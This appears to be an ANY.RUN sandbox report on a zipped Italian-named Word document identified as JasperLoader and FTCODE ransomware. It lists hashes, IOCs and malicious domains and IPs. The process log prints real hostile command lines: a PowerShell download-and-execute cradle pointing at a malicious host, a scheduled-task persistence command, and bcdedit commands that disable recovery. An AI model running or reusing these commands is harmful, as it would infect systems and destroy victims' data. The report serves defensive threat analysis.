analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

emot.zip

Full analysis: https://app.any.run/tasks/1370dac3-bc03-4520-93cc-68c96c1f0574
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: October 14, 2019, 15:27:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
jasper
ransomware
ftcode
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

FBC1D3789183479D8686A60DCD08A473

SHA1:

07BA325AA3D4A823959D0E2312694B670ACAA091

SHA256:

918E74019C2720FFBF63187FAD60612C0B57B28FAC378BCECF4B064D9E6D5BA1

SSDEEP:

3072:fHE4oOkXBNE4ii0kkFh7BmTU41WwnIYo9HeLoOg1cvPUn:fH+IW9kFNQrWwnIhMsWU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 3784)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3784)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3960)
      • mmc.exe (PID: 3432)
    • Writes to a start menu file

      • powershell.exe (PID: 656)
    • JASPER was detected

      • powershell.exe (PID: 656)
    • FTCODE was detected

      • powershell.exe (PID: 656)
    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 656)
    • Renames files like Ransomware

      • powershell.exe (PID: 656)
    • Deletes shadow copies

      • cmd.exe (PID: 1488)
      • cmd.exe (PID: 324)
    • Starts BCDEDIT.EXE to disable recovery

      • cmd.exe (PID: 2892)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 656)
    • Creates files like Ransomware instruction

      • powershell.exe (PID: 656)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 656)
  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 3784)
      • mmc.exe (PID: 4084)
      • mmc.exe (PID: 3432)
      • explorer.exe (PID: 2920)
      • Notepad.exe (PID: 1516)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3784)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3784)
    • Dropped object may contain URL to Tor Browser

      • powershell.exe (PID: 656)
    • Dropped object may contain TOR URL's

      • powershell.exe (PID: 656)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0001
ZipCompression: Deflated
ZipModifyDate: 2019:10:14 16:19:10
ZipCRC: 0x3afd77b0
ZipCompressedSize: 158607
ZipUncompressedSize: 14680065
ZipFileName: Nuovo_documento_95.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
71
Monitored processes
20
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs #JASPER powershell.exe schtasks.exe no specs mmc.exe no specs mmc.exe explorer.exe no specs notepad.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs bcdedit.exe no specs bcdedit.exe no specs wbadmin.exe no specs wbadmin.exe no specs wbadmin.exe no specs vssadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2148"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\emot.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
3784"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Nuovo_documento_95.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
656"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://jes.dhinsuranceservices.com/?need=stafhxt&vid=dpec10&22997'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3960"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 17 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbsC:\Windows\system32\schtasks.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4084"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /sC:\Windows\system32\mmc.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Management Console
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3432"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /sC:\Windows\system32\mmc.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft Management Console
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2920"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1516"C:\Windows\System32\Notepad.exe" C:\Users\Public\Libraries\WindowsIndexingService.vbsC:\Windows\System32\Notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3832"C:\Windows\system32\cmd.exe" /c bcdedit /set swzfijatbu bootstatuspolicy ignoreallfailures C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2892"C:\Windows\system32\cmd.exe" /c bcdedit /set swzfijatbu recoveryenabled no C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 613
Read events
1 798
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
29
Text files
20
Unknown types
13

Dropped files

PID
Process
Filename
Type
2148WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2148.39926\Nuovo_documento_95.doc
MD5:
SHA256:
3784WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREAB8.tmp.cvr
MD5:
SHA256:
656powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZOHUMFAEFLHJWMN09WPJ.temp
MD5:
SHA256:
3784WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D1A57D08-A93E-4DDE-8534-34FF44E53A4F}.tmp
MD5:
SHA256:
656powershell.exeC:\Users\admin\Desktop\coloradocenter.rtf
MD5:
SHA256:
656powershell.exeC:\Users\admin\Desktop\hospitalmembership.rtf
MD5:
SHA256:
656powershell.exeC:\Users\admin\Desktop\hostdivision.jpg
MD5:
SHA256:
656powershell.exeC:\Users\admin\Desktop\jimprove.jpg
MD5:
SHA256:
656powershell.exeC:\Users\admin\Desktop\Nuovo_documento_95.doc
MD5:
SHA256:
656powershell.exeC:\Users\admin\Desktop\Nuovo_documento_95.doc.6c1967
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
656
powershell.exe
GET
200
185.189.151.22:80
http://abby.abbyehughes.com/?need=aegzfej&vid=dpec10&
CH
text
79.7 Kb
malicious
656
powershell.exe
GET
200
185.189.151.22:80
http://jes.dhinsuranceservices.com/?need=stafhxt&vid=dpec10&22997
CH
text
9.34 Kb
malicious
656
powershell.exe
POST
200
185.158.249.197:80
http://connect.contractorquote.info/
NL
text
2 b
malicious
656
powershell.exe
POST
200
185.158.249.197:80
http://connect.contractorquote.info/
NL
text
2 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
656
powershell.exe
185.189.151.22:80
jes.dhinsuranceservices.com
SOFTplus Entwicklungen GmbH
CH
malicious
656
powershell.exe
185.158.249.197:80
connect.contractorquote.info
easystores GmbH
NL
malicious

DNS requests

Domain
IP
Reputation
jes.dhinsuranceservices.com
  • 185.189.151.22
malicious
abby.abbyehughes.com
  • 185.189.151.22
malicious
connect.contractorquote.info
  • 185.158.249.197
malicious

Threats

PID
Process
Class
Message
656
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] JasperLoader Obfuscation
656
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Ransom.PowerShell.Ftcode.A!MSR
2 ETPRO signatures available at the full report
Process
Message
mmc.exe
Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
OnInitialize: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe
ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn